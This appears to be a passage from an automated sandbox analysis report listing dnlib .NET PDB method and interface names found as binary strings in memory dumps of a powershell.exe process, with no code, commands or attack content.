Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.pdb.pdbt.Automation.pdb source: powershell.exe, 00000008.00000002.385304370.0000000004F90000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.380118041.0000000000859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.385123337.0000000004430000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.380118041.0000000000859000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: .Automation.pdb source: powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmp
